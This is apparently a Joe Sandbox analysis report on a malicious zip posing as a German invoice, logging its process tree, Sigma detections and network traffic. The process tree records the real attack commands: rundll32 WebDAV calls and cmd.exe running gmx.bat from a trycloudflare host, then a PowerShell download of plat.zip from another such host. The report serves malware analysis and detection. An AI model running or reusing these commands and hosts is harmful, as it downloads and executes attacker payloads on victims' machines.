Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
https://dl.dropboxusercontent.com/scl/fi/4owe58ovn1ed21kp09mar/Rechnung-201528807699-vom-30.07.2024.zip?rlkey=jd0edpow40fhsvvb7o73yg1xi&st=x3gp2xzd&dl=0

Overview

General Information

Sample URL:https://dl.dropboxusercontent.com/scl/fi/4owe58ovn1ed21kp09mar/Rechnung-201528807699-vom-30.07.2024.zip?rlkey=jd0edpow40fhsvvb7o73yg1xi&st=x3gp2xzd&dl=0
Analysis ID:1491553
Infos:

Detection

Score:64
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Sigma detected: rundll32 run dll from internet
Loading BitLocker PowerShell Module
Opens network shares
Powershell drops PE file
Suspicious powershell command line found
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected non-DNS traffic on DNS port
Drops PE files
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
May sleep (evasive loops) to hinder dynamic analysis
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: PowerShell Web Download
Sigma detected: Usage Of Web Request Commands And Cmdlets
Stores files to the Windows start menu directory

Classification

  • System is w10x64_ra
  • chrome.exe (PID: 1824 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://dl.dropboxusercontent.com/scl/fi/4owe58ovn1ed21kp09mar/Rechnung-201528807699-vom-30.07.2024.zip?rlkey=jd0edpow40fhsvvb7o73yg1xi&st=x3gp2xzd&dl=0 MD5: 83395EAB5B03DEA9720F8D7AC0D15CAA)
    • chrome.exe (PID: 4092 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2064 --field-trial-handle=1984,i,9398603953656203012,10552116802487828007,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 83395EAB5B03DEA9720F8D7AC0D15CAA)
  • rundll32.exe (PID: 6920 cmdline: C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding MD5: EF3179D498793BF4234F708D3BE28633)
  • rundll32.exe (PID: 7108 cmdline: rundll32.exe C:\Windows\system32\davclnt.dll,DavSetCookie giants-twisted-article-promise.trycloudflare.com@SSL https://giants-twisted-article-promise.trycloudflare.com/ MD5: EF3179D498793BF4234F708D3BE28633)
  • rundll32.exe (PID: 7156 cmdline: rundll32.exe C:\Windows\system32\davclnt.dll,DavSetCookie giants-twisted-article-promise.trycloudflare.com@SSL https://giants-twisted-article-promise.trycloudflare.com/ MD5: EF3179D498793BF4234F708D3BE28633)
  • svchost.exe (PID: 7024 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • cmd.exe (PID: 1648 cmdline: C:\Windows\system32\cmd.exe /c \\giants-twisted-article-promise.trycloudflare.com@SSL\DavWWWRoot\gmx.bat MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • Acrobat.exe (PID: 6448 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\Downloads\GAOBCVIQIJ.pdf" MD5: 24EAD1C46A47022347DC0F05F6EFBB8C)
      • AcroCEF.exe (PID: 7628 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)
        • AcroCEF.exe (PID: 7916 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2292 --field-trial-handle=1376,i,10109096854314959362,999452491269217951,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)
    • timeout.exe (PID: 6460 cmdline: timeout /t 5 REM Wait for PDF to open (adjust timeout as needed) MD5: 100065E21CFBBDE57CBA2838921F84D6)
    • powershell.exe (PID: 5888 cmdline: powershell -Command "& { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'https://luck-transaction-en-function.trycloudflare.com/plat.zip' -OutFile 'C:\Users\user\Downloads\plat.zip' }" MD5: 04029E121A0CFA5991749937DD22A1D9)
    • powershell.exe (PID: 5040 cmdline: powershell -Command "& { Expand-Archive -Path 'C:\Users\user\Downloads\plat.zip' -DestinationPath 'C:\Users\user\Downloads' -Force }" MD5: 04029E121A0CFA5991749937DD22A1D9)
  • rundll32.exe (PID: 8156 cmdline: rundll32.exe C:\Windows\system32\davclnt.dll,DavSetCookie giants-twisted-article-promise.trycloudflare.com@SSL https://giants-twisted-article-promise.trycloudflare.com/gmx.bat MD5: EF3179D498793BF4234F708D3BE28633)
  • rundll32.exe (PID: 8072 cmdline: rundll32.exe C:\Windows\system32\davclnt.dll,DavSetCookie giants-twisted-article-promise.trycloudflare.com@SSL https://giants-twisted-article-promise.trycloudflare.com/gmx.bat MD5: EF3179D498793BF4234F708D3BE28633)
  • cleanup
No yara matches

System Summary

barindex
Source: File createdAuthor: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 5040, TargetFilename: C:\Users\user\Downloads\Python\Launcher\py.exe
Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: powershell -Command "& { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'https://luck-transaction-en-function.trycloudflare.com/plat.zip' -OutFile 'C:\Users\user\Downloads\plat.zip' }", CommandLine: powershell -Command "& { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'https://luck-transaction-en-function.trycloudflare.com/plat.zip' -OutFile 'C:\Users\user\Downloads\plat.zip' }", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c \\giants-twisted-article-promise.trycloudflare.com@SSL\DavWWWRoot\gmx.bat, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 1648, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -Command "& { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'https://luck-transaction-en-function.trycloudflare.com/plat.zip' -OutFile 'C:\Users\user\Downloads\plat.zip' }", ProcessId: 5888, ProcessName: powershell.exe
Source: Process startedAuthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: powershell -Command "& { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'https://luck-transaction-en-function.trycloudflare.com/plat.zip' -OutFile 'C:\Users\user\Downloads\plat.zip' }", CommandLine: powershell -Command "& { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'https://luck-transaction-en-function.trycloudflare.com/plat.zip' -OutFile 'C:\Users\user\Downloads\plat.zip' }", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c \\giants-twisted-article-promise.trycloudflare.com@SSL\DavWWWRoot\gmx.bat, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 1648, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -Command "& { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'https://luck-transaction-en-function.trycloudflare.com/plat.zip' -OutFile 'C:\Users\user\Downloads\plat.zip' }", ProcessId: 5888, ProcessName: powershell.exe
Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell -Command "& { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'https://luck-transaction-en-function.trycloudflare.com/plat.zip' -OutFile 'C:\Users\user\Downloads\plat.zip' }", CommandLine: powershell -Command "& { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'https://luck-transaction-en-function.trycloudflare.com/plat.zip' -OutFile 'C:\Users\user\Downloads\plat.zip' }", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c \\giants-twisted-article-promise.trycloudflare.com@SSL\DavWWWRoot\gmx.bat, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 1648, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -Command "& { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'https://luck-transaction-en-function.trycloudflare.com/plat.zip' -OutFile 'C:\Users\user\Downloads\plat.zip' }", ProcessId: 5888, ProcessName: powershell.exe
Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 660, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 7024, ProcessName: svchost.exe

Data Obfuscation

barindex
Source: Process startedAuthor: Joe Security: Data: Command: rundll32.exe C:\Windows\system32\davclnt.dll,DavSetCookie giants-twisted-article-promise.trycloudflare.com@SSL https://giants-twisted-article-promise.trycloudflare.com/, CommandLine: rundll32.exe C:\Windows\system32\davclnt.dll,DavSetCookie giants-twisted-article-promise.trycloudflare.com@SSL https://giants-twisted-article-promise.trycloudflare.com/, CommandLine|base64offset|contains: , Image: C:\Windows\System32\rundll32.exe, NewProcessName: C:\Windows\System32\rundll32.exe, OriginalFileName: C:\Windows\System32\rundll32.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 7004, ProcessCommandLine: rundll32.exe C:\Windows\system32\davclnt.dll,DavSetCookie giants-twisted-article-promise.trycloudflare.com@SSL https://giants-twisted-article-promise.trycloudflare.com/, ProcessId: 7108, ProcessName: rundll32.exe
No Suricata rule has matched

Click to jump to signature section

Show All Signature Results
Source: unknownHTTPS traffic detected: 104.16.230.132:443 -> 192.168.2.17:49704 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.16.230.132:443 -> 192.168.2.17:49705 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.16.230.132:443 -> 192.168.2.17:49706 version: TLS 1.2
Source: unknownHTTPS traffic detected: 40.68.123.157:443 -> 192.168.2.17:49708 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.16.231.132:443 -> 192.168.2.17:49722 version: TLS 1.2
Source: unknownHTTPS traffic detected: 40.68.123.157:443 -> 192.168.2.17:49728 version: TLS 1.2
Source: unknownHTTPS traffic detected: 20.190.159.68:443 -> 192.168.2.17:49733 version: TLS 1.2
Source: unknownHTTPS traffic detected: 13.107.5.88:443 -> 192.168.2.17:49734 version: TLS 1.2
Source: unknownHTTPS traffic detected: 2.23.209.168:443 -> 192.168.2.17:49739 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.16.230.132:443 -> 192.168.2.17:49741 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.16.230.132:443 -> 192.168.2.17:49742 version: TLS 1.2
Source: global trafficTCP traffic: 192.168.2.17:49729 -> 1.1.1.1:53
Source: global trafficTCP traffic: 192.168.2.17:49729 -> 1.1.1.1:53
Source: global trafficTCP traffic: 192.168.2.17:49729 -> 1.1.1.1:53
Source: global trafficTCP traffic: 192.168.2.17:49729 -> 1.1.1.1:53
Source: global trafficTCP traffic: 192.168.2.17:49729 -> 1.1.1.1:53
Source: global trafficTCP traffic: 192.168.2.17:49729 -> 1.1.1.1:53
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownTCP traffic detected without corresponding DNS query: 104.16.230.132
Source: unknownTCP traffic detected without corresponding DNS query: 104.16.230.132
Source: unknownTCP traffic detected without corresponding DNS query: 104.16.230.132
Source: unknownTCP traffic detected without corresponding DNS query: 104.16.230.132
Source: unknownTCP traffic detected without corresponding DNS query: 104.16.230.132
Source: unknownTCP traffic detected without corresponding DNS query: 104.16.230.132
Source: unknownTCP traffic detected without corresponding DNS query: 104.16.230.132
Source: unknownTCP traffic detected without corresponding DNS query: 104.16.230.132
Source: unknownTCP traffic detected without corresponding DNS query: 104.16.230.132
Source: unknownTCP traffic detected without corresponding DNS query: 104.16.230.132
Source: unknownTCP traffic detected without corresponding DNS query: 104.16.230.132
Source: unknownTCP traffic detected without corresponding DNS query: 104.16.230.132
Source: unknownTCP traffic detected without corresponding DNS query: 104.16.230.132
Source: unknownTCP traffic detected without corresponding DNS query: 104.16.230.132
Source: unknownTCP traffic detected without corresponding DNS query: 104.16.230.132
Source: unknownTCP traffic detected without corresponding DNS query: 104.16.230.132
Source: unknownTCP traffic detected without corresponding DNS query: 104.16.230.132
Source: unknownTCP traffic detected without corresponding DNS query: 104.16.230.132
Source: unknownTCP traffic detected without corresponding DNS query: 104.16.230.132
Source: unknownTCP traffic detected without corresponding DNS query: 104.16.230.132
Source: unknownTCP traffic detected without corresponding DNS query: 104.16.230.132
Source: unknownTCP traffic detected without corresponding DNS query: 104.16.230.132
Source: unknownTCP traffic detected without corresponding DNS query: 104.16.230.132
Source: unknownTCP traffic detected without corresponding DNS query: 104.16.230.132
Source: unknownTCP traffic detected without corresponding DNS query: 104.16.230.132
Source: unknownTCP traffic detected without corresponding DNS query: 104.16.230.132
Source: unknownTCP traffic detected without corresponding DNS query: 104.16.230.132
Source: unknownTCP traffic detected without corresponding DNS query: 104.16.230.132
Source: unknownTCP traffic detected without corresponding DNS query: 104.16.230.132
Source: unknownTCP traffic detected without corresponding DNS query: 104.16.230.132
Source: unknownTCP traffic detected without corresponding DNS query: 40.68.123.157
Source: unknownTCP traffic detected without corresponding DNS query: 40.68.123.157
Source: unknownTCP traffic detected without corresponding DNS query: 40.68.123.157
Source: unknownTCP traffic detected without corresponding DNS query: 104.16.230.132
Source: unknownTCP traffic detected without corresponding DNS query: 104.16.230.132
Source: unknownTCP traffic detected without corresponding DNS query: 104.16.230.132
Source: unknownTCP traffic detected without corresponding DNS query: 104.16.230.132
Source: unknownTCP traffic detected without corresponding DNS query: 104.16.230.132
Source: unknownTCP traffic detected without corresponding DNS query: 104.16.230.132
Source: unknownTCP traffic detected without corresponding DNS query: 104.16.230.132
Source: unknownTCP traffic detected without corresponding DNS query: 104.16.230.132
Source: unknownTCP traffic detected without corresponding DNS query: 40.68.123.157
Source: unknownTCP traffic detected without corresponding DNS query: 40.68.123.157
Source: global trafficDNS traffic detected: DNS query: dl.dropboxusercontent.com
Source: global trafficDNS traffic detected: DNS query: www.google.com
Source: global trafficDNS traffic detected: DNS query: luck-transaction-en-function.trycloudflare.com
Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
Source: unknownNetwork traffic detected: HTTP traffic on port 49699 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
Source: unknownNetwork traffic detected: HTTP traffic on port 49676 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49691 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
Source: unknownNetwork traffic detected: HTTP traffic on port 49675 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49699
Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49703 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49691
Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49678 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
Source: unknownNetwork traffic detected: HTTP traffic on port 49680 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49677 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49703
Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
Source: unknownHTTPS traffic detected: 104.16.230.132:443 -> 192.168.2.17:49704 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.16.230.132:443 -> 192.168.2.17:49705 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.16.230.132:443 -> 192.168.2.17:49706 version: TLS 1.2
Source: unknownHTTPS traffic detected: 40.68.123.157:443 -> 192.168.2.17:49708 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.16.231.132:443 -> 192.168.2.17:49722 version: TLS 1.2
Source: unknownHTTPS traffic detected: 40.68.123.157:443 -> 192.168.2.17:49728 version: TLS 1.2
Source: unknownHTTPS traffic detected: 20.190.159.68:443 -> 192.168.2.17:49733 version: TLS 1.2
Source: unknownHTTPS traffic detected: 13.107.5.88:443 -> 192.168.2.17:49734 version: TLS 1.2
Source: unknownHTTPS traffic detected: 2.23.209.168:443 -> 192.168.2.17:49739 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.16.230.132:443 -> 192.168.2.17:49741 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.16.230.132:443 -> 192.168.2.17:49742 version: TLS 1.2

System Summary

barindex
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\Downloads\Python\Python312\DLLs\_queue.pydJump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\Downloads\Python\Launcher\pyshellext.amd64.dllJump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\Downloads\Python\Python312\DLLs\_asyncio.pydJump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\Downloads\Python\Python312\DLLs\_sqlite3.pydJump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\Downloads\Python\Python312\DLLs\_zoneinfo.pydJump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\Downloads\Python\Python312\DLLs\tk86t.dllJump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\Downloads\Python\Launcher\pyw.exeJump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\Downloads\Python\Python312\DLLs\_lzma.pydJump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\Downloads\Python\Python312\DLLs\_ctypes_test.pydJump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\Downloads\Python\Python312\DLLs\_elementtree.pydJump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\Downloads\Python\Python312\DLLs\_hashlib.pydJump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\Downloads\Python\Python312\DLLs\_testmultiphase.pydJump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\Downloads\Python\Python312\DLLs\_testcapi.pydJump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\Downloads\Python\Python312\DLLs\libffi-8.dllJump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\Downloads\Python\Python312\DLLs\zlib1.dllJump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\Downloads\Python\Python312\DLLs\_testsinglephase.pydJump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\Downloads\Python\Python312\DLLs\winsound.pydJump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\Downloads\Python\Python312\DLLs\unicodedata.pydJump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\Downloads\Python\Python312\DLLs\_multiprocessing.pydJump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\Downloads\Python\Python312\DLLs\libcrypto-3.dllJump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\Downloads\Python\Python312\DLLs\_testconsole.pydJump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\Downloads\Python\Python312\DLLs\_testimportmultiple.pydJump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\Downloads\Python\Python312\DLLs\_decimal.pydJump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\Downloads\Python\Launcher\py.exeJump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\Downloads\Python\Python312\DLLs\_testclinic.pydJump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\Downloads\Python\Python312\DLLs\_overlapped.pydJump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\Downloads\Python\Python312\DLLs\libssl-3.dllJump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\Downloads\Python\Python312\DLLs\tcl86t.dllJump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\Downloads\Python\Python312\DLLs\_testbuffer.pydJump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\Downloads\Python\Python312\DLLs\_uuid.pydJump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\Downloads\Python\Python312\DLLs\_msi.pydJump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\Downloads\Python\Python312\DLLs\_tkinter.pydJump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\Downloads\Python\Python312\DLLs\_testinternalcapi.pydJump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\Downloads\Python\Python312\DLLs\select.pydJump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\Downloads\Python\Python312\DLLs\_bz2.pydJump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\Downloads\Python\Python312\DLLs\pyexpat.pydJump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\Downloads\Python\Python312\DLLs\sqlite3.dllJump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\Downloads\Python\Python312\DLLs\_ctypes.pydJump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\Downloads\Python\Python312\DLLs\_ssl.pydJump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\Downloads\Python\Python312\DLLs\_socket.pydJump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\Downloads\Python\Python312\DLLs\_wmi.pydJump to dropped file
Source: C:\Windows\System32\svchost.exeFile created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
Source: classification engineClassification label: mal64.spyw.evad.win@52/173@5/136
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\Downloads\a4af3cbb-7357-4067-aa46-4a0ca1fd1213.tmp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeFile created: C:\Users\user\AppData\Local\Temp\acrobat_sbx\NGL\NGLClient_AcrobatReader123.6.20320.6 2024-08-12 08-21-17-843.log
Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c \\giants-twisted-article-promise.trycloudflare.com@SSL\DavWWWRoot\gmx.bat
Source: C:\Windows\System32\cmd.exeFile read: C:\Users\user\Desktop\desktop.ini
Source: C:\Windows\System32\rundll32.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknownProcess created: C:\Windows\System32\rundll32.exe C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
